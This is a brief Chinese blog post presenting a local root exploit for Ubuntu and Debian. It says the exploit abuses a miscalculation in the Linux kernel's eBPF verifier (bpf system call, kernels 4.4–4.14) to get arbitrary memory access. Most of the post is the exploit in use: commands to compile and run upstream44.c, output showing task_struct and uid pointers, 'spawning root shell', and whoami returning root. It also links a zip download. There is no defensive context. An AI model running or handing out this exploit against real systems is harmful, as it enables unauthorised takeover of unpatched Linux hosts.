Ubuntu 提权 EXP

2018-03-30 2018-03-30 约 100 字预计阅读 1 分钟

该漏洞存在于 Linux 内核带有的 eBPF bpf(2) 系统调用中, 当用户提供恶意 BPF 程序使 eBPF 验证器模块产生计算错误, 导致任意内存读写问题.

kernel 4.14 - 4.4

Only Ubuntu / Debian

1
2
3
4
5
6
7
8


$ gcc -o exp upstream44.c
$ chmod 777 exp
$ ./exp
task_struct = ffff8800789c1540
uidptr = fff88007c0cb6c4
spawning root shell
# whoami
root

upstream44.zip